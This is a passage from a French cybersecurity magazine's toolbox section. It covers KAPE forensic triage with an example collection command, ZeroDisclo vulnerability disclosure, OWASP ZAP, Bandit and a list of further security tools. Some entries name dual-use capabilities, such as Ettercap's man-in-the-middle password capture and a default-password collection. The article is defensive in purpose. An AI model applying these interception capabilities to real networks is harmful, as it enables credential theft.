collectés sur les machines compromises, puis analysés.
Créé par l’entreprise Kroll, KAPE est l’un des outils les plus
rapides pour réaliser le triage des artefacts. Il propose
une vaste collection de plugins (appelés targets/
modules). Il est gratuit pour un usage éducatif ou de
recherche, pour toutes les agences gouvernementales
(qu’elles opèrent au niveau local, régional, fédéral ou
international), mais également pour les entreprises qui
en font un usage interne (il ne nécessite une licence
commerciale que lorsqu’il est utilisé sur un réseau tiers,
dans le cadre d’un engagement facturé). Vous trouverez
des informations complémentaires sur https://ericzim-
merman.github.io/KapeDocs.
À ne pas oublier dans votre trousse à outils !
_10 : Collecter les informations
en vue du forensic
KAPE (Kroll Artifact Parser and Extractor) est un
logiciel de triage sur des ordinateurs Windows,
utilisable en ligne de commande, mais disposant
aussi d’une interface graphique. Il est téléchargeable
depuis le site www.kroll.com. Il requiert les privilèges administrateur
pour collecter des artefacts et permet de rassembler la plupart
des données nécessaires à une enquête judiciaire.
La première phase d’exécution concerne la collecte des cibles (targets),
c’est-à-dire les plugins qui déterminent quels sont les fichiers à copier
(et les fichiers verrouillés par l’OS). La seconde est le lancement des
modules (intégrés à Windows ou provenant de tiers) tels que Netstat,
winPmem, qui peuvent utiliser les artefacts définis dans la première phase
et qui génèrent en sortie des fichiers exploitables pour l’investigation
(txt, csv, etc.).
La configuration KAPE devrait être prête avant qu’un incident ne se
produise. Une fois le logiciel téléchargé – typiquement sur un disque
externe ou un disque réseau –, commencez par mettre à jour les modules
en lançant gkape.exe et sélectionnez l’option en bas “Sync with Github”.
Ensuite, téléchargez et placez dans “bin/annuire” les outils
manquants (ex. : message d’erreur winPmem lors de la phase de lance-
ment du test – Cannot find executable “winpmem.exe”), le lien vers l’outil
est fourni dans les templates KAPE pour les targets/méthodes (champ :
BinaryUrl).
Une attaque a eu lieu ! Exécutez la commande suivante en tant qu’ad-
ministrateur pour récupérer des artefacts :
JAROSŁAW OPARKA | CSIRT Reverse Engineer, Atos
kape.exe --tsource C: --tdest kape_%m_output --tflush --target
WindowsDefender,WebBrowsers,$MFT,Amcache,EventLogs,-
FileSystem,LnkFilesAndJumpLists,LogFiles,Prefetch,
RegistryHives,WindowsTimeline --zip archive --mdest
kape_%m_outputmodules --mflush --module BrowsingHis-
toryView,MFTECmd,ARPCache,autoruns,DNSCache,han-
dle,IPConfig,NetStat,ProcessDetails,qwinsta,SystemInfo,WinP-
mem,TaskScheduler,RegRipper-ALL
--zpw very_long_secure_password
L A T R O U S S E À O U T I L S
6. _10 / _11_Cyberun#12
La divulgation coordonnée de vulnérabilités (CVD) est
le processus permettant une collaboration entre un
hacker éthique et le responsable du SI. Les hackers
éthiques peuvent significativement contribuer à accroître la sécurité
numérique. Toutefois, le “premier contact” est souvent difficile à établir.
De plus, même lorsqu’une vulnérabilité est signalée, les responsables
du SI affecté peuvent préférer ne pas en tenir compte. Ce silence pousse
à la divulgation publique, moyen de faire pression pour faire corriger
la vulnérabilité.
ZeroDisclo.com est une plateforme non partisane et gratuite, opérée par
Yes We Hack, qui permet de signaler des vulnérabilités tout en
gardant l’anonymat. Grâce à ZeroDisclo, la divulgation peut également se
faire via le navigateur Tor. Lors de la rédaction, le hacker éthique choisit
de laisser des coordonnées de contact.
Quel que soit le navigateur utilisé, le rapport est chiffré avec la clé publique
de l’organisation réceptrice (telle qu’un CERT privé ou national), puis signé et
horodaté par une blockchain. Le site
envoie le rapport, et le hacker signa-
lant la vulnérabilité reçoit un certifi-
cat en guise de preuve de dépôt.
ZeroDisclo.com formalise le rap-
port, notamment via différents
critères permettant le calcul du
score de sévérité CVSS. Plus
important encore, le chiffrement du rapport assure que ZeroDisclo.com
fait seulement office de “courroie de transmission”, et non de base de
données de vulnérabilités. À aucun moment, la plateforme ou les individus
qui l’administrent n’accèdent aux détails de la vulnérabilité décrite.
Ce fonctionnement permet de faciliter la divulgation coordonnée de
vulnérabilités, sans que ZeroDisclo.com n’ait à engranger une connaissance
dangereuse des défaillances affectant les systèmes d’information de tiers.
La confidentialité des informations sur le potentiel risque de sécurité est
assurée ; l’intégrité du rapport l’est tout autant, grâce au chiffrement et à
l’horodatage blockchain.
Les enjeux de la divulgation
coordonnée de vulnérabilités
Lorsque les acteurs malveillants sont les seuls informés
d’une vulnérabilité ou ont un avantage chronologique,
le risque numérique augmente pour tous, notamment
si les vulnérabilités ont des répercussions importantes.
L’adoption de politiques de divulgation coordonnée
a ainsi des bénéfices significatifs pour les parties
prenantes : montée en maturité de la sécurité,
développement de talents au sein des organisations
et autonomie technologique de par la maîtrise
renforcée des risques numériques liés à la gestion
des vulnérabilités.
La divulgation de vulnérabilités est un processus,
et non un événement. Elle implique aussi une montée
en maturité car elle requiert de comprendre, cartogra-
phier, structurer, responsabiliser et de rendre opérant
un processus, où les rôles et responsabilités des actifs
numériques sont clairement identifiés et endossés.
Le cycle de vie d’une vulnérabilité décrit les différents
événements susceptibles de l’affecter et d’influencer
le niveau de risque pour les utilisateurs, mais aussi
la nécessité d’action de la part des différentes parties
prenantes. En outre, une vulnérabilité découverte est
susceptible d’être redécouverte dans un délai relative-
ment court. Ces périodes déterminent les phases de
variation de l’exposition aux risques. À cette notion
de variation avec le cycle de vie de la vulnérabilité
s’ajoutent les appétences différentes au risque.
Il est donc primordial de maîtriser, autant que possible,
le chaînon fondamental de la divulgation, afin de
garantir la connaissance restreinte de l’existence
et l’impact potentiel de la vulnérabilité.
RAYNA STAMBOLIYSKA | VP Gouvernance et affaires publiques, Yes We Hack
_11 : Divulgation coordonnée
de vulnérabilités
ZERODISCLO.COM
De la qualité du code de vos applicatifs (sites web, développements
“maison”, etc.) dépend essentiellement leur sécurité.
Que faire pour la renforcer et comment gérer les vulnérabilités ?
AMÉLIORER LES APPLICATIONS
_12
Outil DAST (Dynamic Application Security Testing),
il vise à tester la sécurité d’un site web selon son
comportement dynamique. Développé par la
vénérable organisation OWASP, ZAP dispose d’une
communauté impressionnante. Avec 85 000 télé-
chargements par mois, c’est l’un des outils de sécurité open source
les plus populaires.
Son interface graphique est datée, mais simple et efficace. La docu-
mentation est très complète, et on trouve d’excellentes ressources
sur Internet pour s’initier rapidement à ZAP et l’intégrer dans de
nombreux environnements (par exemple sur Azure).
Ecrit en Java, ZAP est multiplateforme (Windows/Linux/MacOS), ne
nécessite pas d’installation (si l’environnement Java est déjà installé),
se lance sans aucune difficulté et s’avère très fiable.
Le mode automatique est particulièrement pratique pour obtenir
rapidement l’intégration dans une chaîne CI/CD. ZAP intègre un
module capable de trouver automatiquement les différentes URL
d’un site. Si certaines alertes correspondent à des faux positifs, il est
souvent judicieux de les prendre en compte et de faire évoluer son
design pour les éviter.
Pour les pentesters, le mode manuel permet de mener des attaques
sophistiquées. Le lancement automatique d’un navigateur préconfi-
guré est particulièrement appréciable. Le mode “request editor”
permet de facilement personnaliser une requête initialement faite
par le navigateur. L’outil conserve la trace de toutes les connexions,
ce qui est très pratique pour revenir sur ce que l’on a fait (comme git
pour un développeur).
ZAP intègre un magasin d’extensions. On en trouve notamment pour
l’intégration à Jenkins, pour le standard OpenAPI, pour SAML, etc.
On peut également développer des extensions “maison” en Java,
et même intégrer ZAP dans un programme Python (package python-
owasp-zap) !
Site : https://www.zaproxy.org/
_13
Bandit est un outil SAST (Static Application Security Testing). Cela
consiste à analyser le code source dans sa forme d’origine pour
détecter des éventuelles formes de codage ou d’appels non sécurisés
qui peuvent conduire à des failles (anti-patterns). Il est dédié au
Python et peut compléter une analyse statique classique de type
Linter pour couvrir les aspects sécuritaires. Initialement démarré par
OpenStack, il a été repris par la communauté active PYCQA (Python
Code Quality Authority). Son code source ouvert et gratuit permet
d’étendre le jeu de “tests” au-delà des 70 existants, et de couvrir
éventuellement plus de vulnérabilités (ex. : interdire une fonction,
détecter le mode debug, etc.).
L’outil peut se
l a n ce r s u r u n
répertoire de code
Python. Il l’analyse
en mode récursif,
puis renvoie les
résultats par criti-
cité sur la ligne de
commande, ou
d a n s l ’u n d e s
formats supportés
p o u r d ’a u t r e s
intégrations (html, csv, json, etc.). Naturellement, il peut retourner
des faux positifs. Vous pouvez les gérer de différentes façons, avec
précaution : en excluant des répertoires (de tests, par exemple), en
ignorant certains tests à l’aide de skips, ou en annotant certaines
lignes de code par le commentaire “#nosec”.
Bandit est un outil simple, efficace et extensible, indispensable pour
la sécurité du code Python. D’autres outils open source existent
également en fonction des langages et frameworks utilisés.
Site : https://github.com/PyCQA/bandit
ABDERRHAMANE SMIMITE | Managing Director, Intuitem
BANDIT
Audit de sécurité “frugal”
de code source
La détection des vulnérabilités dans les chaînes CI/CD est
devenue incontournable pour limiter les risques d’attaque
sur les produits, services et API exposés. En effet, corriger un
problème avant qu’il soit exploitable est bien plus rationnel
qu’attendre une attaque pour réagir, d’autant plus si la
démarche est automatisable.
Par ailleurs, la cybersécurité n’échappe pas à la vague open
source, a fortiori dans une période où les budgets sont sous
pression.
Dans le domaine du test de sécurité des applications, Bandit
et ZAP sont des produits open source particulièrement
populaires, seuls ou en compléments d’outils commerciaux
plus ambitieux. Nous apprécions en particulier leur capacité
à être intégrés à des chaînes CI/CD et leur extensibilité.
OWASP ZAP
L A T R O U S S E À O U T I L S
7. Magnet Acquire : www.magnetforensics.com/resources
Création d’images à fin forensique de smartphones (iOS/Android),
disques durs et médias externes. Voir aussi sleuthkit.org.
RIM (incident response methodologie) :
github.com/certsocietegenerale/IRM
Proposées par le CERT de la Société Générale, des fiches
pratiques à utiliser pour mieux répondre aux incidents
(à lire de préférence AVANT l’incident !).
Infection monkey : github.com/guardicore/monkey
Teste la résilience aux violations de périmètre et aux
infections internes (pentesting automatisé) en utilisant
différentes méthodes pour se propager à travers un datacenter.
Lynis : cisofy.com/lynis
Audite les serveurs sous Linux (et MacOS) afin d’en renforcer
la sécurité (OS hardening) : contrôle des paramètres du noyau,
des mécanismes d’authentification, de la journalisation... Peut
utiliser, si nécessaire, les normes ISO 27001, PCI DSS ou HIPAA.
Zed Attack Proxy : zaproxy.org
Scanneur de vulnérabilités exclusivement dédié aux sites
web (database Injection, cross site scripting injection,
HTTP response splitting, .htaccess misconfigurations,
shellshock, etc.). Voir aussi wapiti.sourceforge.io.
Vuls : vuls.io
Scanneur de vulnérabilités, utilisable en mode local
ou distant, ne nécessitant pas l’installation d’agent.
Permet le reporting grâce à vulsRepo.
Cuckoo sandbox : cuckoosandbox.org
Espace protégé et automatisé d’analyse de malwares : permet
de qualifier un fichier suspect sans avoir besoin de l’envoyer
dans le cloud (virustotal) et donc d’en préserver la confidentialité.
Moloch : molo.ch
Outil de capture de paquets réseaux, distribué à large échelle,
permettant des recherches rapides (indexation).
Ettercap : ettercap-project.org
Intercepte le trafic réseau, permet de réaliser des attaques
Man In The Middle, de récupérer des mots de passe sur HTTP,
FTP et certains protocoles chiffrés. Peut être utilisé en
complément de PassHunt (github.com/Viralmaniar), qui
regroupe tous les mots de passe par défaut des équipements.
Kismet : kismetwireless.org
Détecteur passif de réseaux sans fil, détermine les points
d’accès et les clients WiFi, détecte les sniffeurs actifs
(NetStumbler), ainsi que les intrusions WiFi, bluetooth
et d’autres protocoles sans fil (utilise alors un dongle SDR).
10 autres outils proposés par nos experts
Le magazine Cyberun est un bimestriel
édité par Cyberun, association loi 1901.
Boîte 81, 206 quai de Valmy, 75010 Paris.
Directrice de publication : Hélène Windish
Rédacteur en chef :
Stéphane Darget
Look at Sciences a participé à ce numéro
Création et maquette :
www.rodolpherrera.fr
ISSN : 2677-5964. Toute reproduction,
traduction, reproduction intégrale ou
partielle est interdite, sans l’autorisation
écrite de Cyberun, sauf dans les cas
prévus par l’article L122-5
du Code de la propriété intellectuelle.
En tant qu’abonné au magazine, vous
êtes autorisé à imprimer votre exemplaire.
Prix au numéro (imprimé et expédié) : 25 €
Les grognements de Cy
Visiblement, je ne mets pas assez les pattes à la pâte.
Résultat, je me les suis fait prendre dans le honeypot,
comme un ourson bleu dans le pot de miel : comme il
n’était pas question de rester à hiberner tout l’été, je devais
à l’arrache mettre en place une solution de télépêche de
saumon. Après un délicieux repas, j’ai choisi BearIot (qui,
malgré son nom, était totalement immonde*) et pondu
un excellent rapport. Mais... cette solution s’est avérée
coûteuse, inefficace et, en fait, une resucée d’un vieux projet
open source. Je vous passe les remontrances du Grand
Chef, qui lui, évidemment, ne fait que papoter et arrive
quand même à enchaîner les bourdes. OK, les tableaux
de bord et les référentiels, c’est utile... Mais si j’avais un
peu plus écouté Emma, la geekette, qui m’avait bien parlé
d’un truc, et suivi ce MOOC technique sur les IoT...
*(NdT : “to be a riot” : être génial, irrésistible)
Qui sommes-nous ?
Cyberun est un magazine totalement indépendant, édité par
financement participatif. Il fédère une large communauté d’acteurs
de la cybersécurité qui souhaitent partager leurs expertises
et leurs expériences. Pour favoriser l’échange de connaissances
et ne pas se contenter d’approximations, chaque numéro est dédié
à un thème unique.
Abonnez-vous gratuitement à Cyberun !
Recevez automatiquement le magazine en PDF
en vous inscrivant sur cyberun.net et découvrez
comment vous pouvez, vous aussi, participer
à cette aventure !
Contactez-nous !
Pour diffuser ce magazine lors d’un événement, rejoindre
la communauté, ou pour toute information complémentaire :
www.cyberun.net (lien “Rejoignez la communauté !”)
Cy-Bear, le gentil ours vivant en Alaska...
Imprimez-moi ! Ne me jetez pas, partagez-moi !